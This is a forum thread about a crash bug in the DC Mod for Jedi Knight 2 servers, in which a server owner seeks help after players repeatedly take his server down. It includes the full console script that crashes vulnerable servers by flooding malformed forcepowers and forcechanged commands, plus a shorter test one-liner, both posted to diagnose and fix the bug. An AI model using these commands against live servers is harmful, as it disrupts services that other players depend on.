dc mod vulnerability?

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

hello again...

i have a JK2 server and clan , it's one of the last populated servers in jk2, and I m running dcmod v1.2 .

There are some guys that have a script or something that restart the server, everytime they want it.
When server is populated , they just come and restart.
I m wondering if you guys know how i can fix that

aluigi · **Posted:** 22 Jun 2009 09:20

what of the work-arounds on http://aluigi.org/patches.htm#quake3 have you applied?
I don't know this mod or jk2 so it's possible that there is also a bug affecting this specific mod.

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

I applied all patches.
Yes this script only works on dcmod 1.2.

I dont know what to do , nobody wants to share that script with me , and they keep restarting my server

UnnamedPlayer · **Joined:** 21 Feb 2009 15:32 **Posts:** 8

It looks like the mod has some stages of admin rcon, post you cfg with all cvars, you can change your rcon cvars later

evan1715 · **Posted:** 23 Jun 2009 16:34

evan1715 wrote:

--DS-Online v1.32 is vulnerable to name crash/glitch.
--DC Mod v1.2 is vulnerable to flood.
--Jedi Academy Mod 1.6 is vulnerable to flood, name crash, force crash and fake players.

userinfo flood - rapid changing of a clients userinfo, overflowing the server causing lag and potential crashing
fix: get a different mod o_O

aluigi · **Posted:** 23 Jun 2009 17:31

a generic useful suggestion valid for any field is to check ever the date of the latest version of a software/game/mod and verifying that it's still supported by its author and how much it's supported (for example if the author replies soon to the reports of the users and fixes the problems immediately).

using an old software or an old thirdy part component it's the first way to get problems (and from what I have seen this dc mod no longer has a homepage and it's closed source)

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

I got my hands on the script that does this .

I'd prefere not to post it on the forum since all remaining jk2 servers use dcmod... so if anybody visits ...

shd i pm u luigi?

aluigi · **Posted:** 26 Jun 2009 20:26

personally I'm not interest in this for various reasons (old unsupported mod, usually the bugs in these mods are hard/boring to fix, general lack of interest and so on).

evan1715 · **Posted:** 29 Jun 2009 22:05

darthboss wrote:

I got my hands on the script that does this .

I'd prefere not to post it on the forum since all remaining jk2 servers use dcmod... so if anybody visits ...

shd i pm u luigi?

u should pm me it and ill tell u if i can help u with it

u can't prevent the spread of this 'script' it will get out to the general public of jk2 1.04 and it will be used, just like every other exploit

and no, i wont be passing it around either.

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

bind "p" "vstr crash00"
set crash00 " vstr crash01; vstr crash01; vstr crash01; wait 250; vstr crash02; vstr crash02; vstr crash02"
set crash01 " -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7; set forcepowers -~????^^^7^6^7"
set crash02 " forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged; wait 1; forcechanged"

This is the script.

It works like this.

You go spec , exec the script , then join game with these force variables.
And it crashes the server.

It works on most dcmod servers.... but not all.. some have fix already.

The servers with FIX , dont let you join game with those force variables , it asks you to fill the force points.

evan1715 · **Posted:** 03 Jul 2009 22:17

ok, this looks like force crash... but extreme version lol.
so let's go ahead and try and see if ur version of dcmod is fixed against force crash
go into your server, open your console and type in
/set forcepowers 1337;wait 1;forcechanged
kill urself and respawn.....
if u respawn with no server crash, i want u to do the same method people are using with this.
go to spec, go ahead and bind it and do it repeatedly and then join.

if the server does not crash with the regular force crash, ur mod is protected, but apparently not from this one :P
so the mod is probably a very basic protection and these people cheated the system and found a bug in the patch.

so go ahead and test it on ur version of dcmod and tell me ur results and we'll go on from there xD
also, if it doesn't crash with the command line given above, give me ur ip to ur server so i can test some stuff

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

it crashed.
i did that command , when i killed myself i was spec.
when i rejoined game , server crashed.

78.143.19.186:4002

this is my server.
thanks for the help , I owe you a beer

evan1715 · **Posted:** 04 Jul 2009 02:25

ah so ur version of dcmod is not fixed from force crash :P
it's a very common crash people use :P
does dcmod have an open source so the bug can be fixed through code?

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

Well DCMOD is a Pk3 + server.cfg

I can send you the pk3 and the cfg

what about this...

http://gamall-ida.com/f/download/file.p ... 57bc453512

darthboss · **Joined:** 22 Jul 2008 02:26 **Posts:** 14

NVM , PROBLEM SOLVED , I REPLACED THE PK3 WITH SOME OF A FRIEND.
DCMOD.PK3 , AND IT DOESNT CRASH IT NOW.

THANKS FOR EVERYTHING.

aluigi · **Posted:** 04 Jul 2009 16:08

uhmmm so basicly you used a multiplayer server mod from an untrusted source (the so called "friends" are the first cause of security problems) without knowing what it really changes or who created it... wow, and then people wonder why they get "hacked" (meaningless word that many people like to use for anything) eh eh eh :)

evan1715 · **Posted:** 06 Jul 2009 04:14

uh ok cool, i suppose.

calm down luigi :)

Luigi Auriemma

dc mod vulnerability?